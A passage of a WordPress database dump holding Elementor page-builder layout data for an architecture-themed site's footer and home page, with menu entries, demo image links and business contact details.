80\",\"phone_address\":\"+23425446680\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":true},{\"id\":\"d70c8a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":100,\"align_tablet\":\"flex-start\"},\"elements\":[{\"id\":\"d12cde8\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#1D1D1D\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_padding\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_element_vertical_align\":\"center\",\"hover_primary_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"5931fd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.68,\"content_position\":\"top\",\"align\":\"flex-start\",\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"077\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"78\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02b9056\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9ce475a\",\"elType\":\"widget\",\"settings\":{\"menu_slug\":\"menu-explore\",\"menu_color_normal\":\"#808080\",\"text_typography_typography\":\"custom\",\"text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"menu_color_hover\":\"#E3B25A\",\"sub_menu_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_footer\"}],\"isInner\":false},{\"id\":\"18d6727\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.289,\"content_position\":\"top\",\"align\":\"flex-start\",\"background_background\":\"classic\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-footer-right.png\",\"id\":145,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"css_classes\":\"retirio_stretch_column_right\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.12,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"background_overlay_position_tablet\":\"initial\",\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_size_tablet\":\"contain\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a3214d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6b9862e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\",\"link_label\":\"30 Broklyn Golden Street, New York United States of America\",\"link_address\":{\"url\":\"https:\\/\\/www.google.com\\/maps\",\"is_external\":\"on\",\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#808080\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"initial\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":191},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f3df713\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"10\",\"bottom\":\"25\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"5aa0f63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ebc849a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\\u00a9 All Copyright 2022 by Ovatheme.com\",\"align\":\"center\",\"text_color\":\"#808080\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2929,4729,'_elementor_page_assets','a:0:{}'),(2930,4729,'_elementor_css','a:6:{s:4:\"time\";i:1668396690;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:2;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2931,4730,'_wp_page_template','default'),(2932,4730,'_elementor_edit_mode','builder'),(2933,4730,'_elementor_template_type','wp-post'),(2934,4730,'_elementor_version','3.6.6'),(2935,4730,'_elementor_data','[{\"id\":\"ef331a9\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/lines.png\",\"id\":139,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"initial\",\"background_overlay_xpos\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"%\",\"size\":135,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":145,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-450,\"sizes\":[]},\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"auto\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.04,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_position_mobile\":\"initial\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"7d36326\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":58.992,\"content_position\":\"top\",\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"120\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bce0c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"We build amazing architectural designs\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e5254c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[mc4wp_form id=\\\"107\\\"]\",\"_css_classes\":\"mc4wp-style-1\"},\"elements\":[],\"widgetType\":\"shortcode\"},{\"id\":\"4631f27\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"layout\":\"full_width\",\"content_position\":\"middle\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"88bc706\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"626a216\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"021 22544768\",\"phone_address\":\"021 22544768\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"auto\",\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"0caec2f\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":true},{\"id\":\"d70c8a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":100,\"align_tablet\":\"flex-start\"},\"elements\":[{\"id\":\"d12cde8\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#1D1D1D\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_padding\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_element_vertical_align\":\"center\",\"hover_primary_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"5931fd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.68,\"content_position\":\"top\",\"align\":\"flex-start\",\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"077\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"78\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02b9056\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9ce475a\",\"elType\":\"widget\",\"settings\":{\"menu_slug\":\"menu-explore\",\"menu_color_normal\":\"#808080\",\"text_typography_typography\":\"custom\",\"text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"menu_color_hover\":\"#E3B25A\",\"sub_menu_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_footer\"}],\"isInner\":false},{\"id\":\"18d6727\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.289,\"content_position\":\"top\",\"align\":\"flex-start\",\"background_background\":\"classic\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-footer-right.png\",\"id\":145,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"css_classes\":\"retirio_stretch_column_right\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.12,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"background_overlay_position_tablet\":\"initial\",\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_size_tablet\":\"contain\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a3214d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6b9862e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":\"on\",\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#808080\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"initial\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":191},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f3df713\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"10\",\"bottom\":\"25\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"5aa0f63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ebc849a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\\u00a9 All Copyright 2022 by Ovatheme.com\",\"align\":\"center\",\"text_color\":\"#808080\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2936,4730,'_elementor_page_assets','a:0:{}'),(2937,4730,'_elementor_css','a:6:{s:4:\"time\";i:1668396690;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:2;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2938,103,'_elementor_pro_version','3.8.1'),(2939,4731,'_menu_item_type','post_type'),(2940,4731,'_menu_item_menu_item_parent','0'),(2941,4731,'_menu_item_object_id','22'),(2942,4731,'_menu_item_object','page'),(2943,4731,'_menu_item_target',''),(2944,4731,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2945,4731,'_menu_item_xfn',''),(2946,4731,'_menu_item_url',''),(2948,4732,'_menu_item_type','post_type'),(2949,4732,'_menu_item_menu_item_parent','0'),(2950,4732,'_menu_item_object_id','38'),(2951,4732,'_menu_item_object','page'),(2952,4732,'_menu_item_target',''),(2953,4732,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2954,4732,'_menu_item_xfn',''),(2955,4732,'_menu_item_url',''),(2957,4733,'_menu_item_type','post_type'),(2958,4733,'_menu_item_menu_item_parent','0'),(2959,4733,'_menu_item_object_id','40'),(2960,4733,'_menu_item_object','page'),(2961,4733,'_menu_item_target',''),(2962,4733,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2963,4733,'_menu_item_xfn',''),(2964,4733,'_menu_item_url',''),(2967,665,'_elementor_css','a:6:{s:4:\"time\";i:1669361766;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2968,4734,'_wp_page_template','elementor_header_footer'),(2969,4734,'_elementor_edit_mode','builder'),(2970,4734,'_elementor_template_type','wp-page'),(2971,4734,'_elementor_version','3.6.6'),(2972,4734,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_